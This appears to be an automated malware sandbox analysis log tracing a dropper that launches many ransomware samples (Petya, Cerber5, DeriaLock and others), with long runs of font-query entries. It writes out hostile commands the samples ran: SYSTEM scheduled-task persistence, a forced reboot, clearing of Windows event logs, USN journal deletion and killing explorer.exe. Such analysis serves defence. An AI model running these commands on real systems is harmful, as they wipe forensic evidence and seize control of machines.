        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe "C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe "C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe "C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe "C:\Users\user\AppData\Local\Temp\101awtpm.1qs\Endermanch@NoMoreRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe "C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe "C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeProcess created: C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe "C:\Users\user\AppData\Local\Temp\zfaio0hk.qy4\Endermanch@WinlockerVB6Blacksod.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2112656973 && exit"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:06:00
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 2112656973
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exe C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,12_2_0477841D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04776FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,12_2_04776FFE
        Source: Endermanch@Birele.exe, Endermanch@Birele.exe, 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
        Source: Endermanch@Birele.exe, 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: taskkill /F /IM explorer.exeProgram Managerh
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_00404AB0
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: GetLocaleInfoA,11_2_0040536A
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: GetLocaleInfoA,11_2_0040536C
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: GetLocaleInfoA,11_2_0040C568
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: GetLocaleInfoA,11_2_0040C51C
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: GetLocaleInfoA,GetACP,11_2_0040D970
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeQueries volume information: C:\Users\user\Desktop\1jDe7zWnoe.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
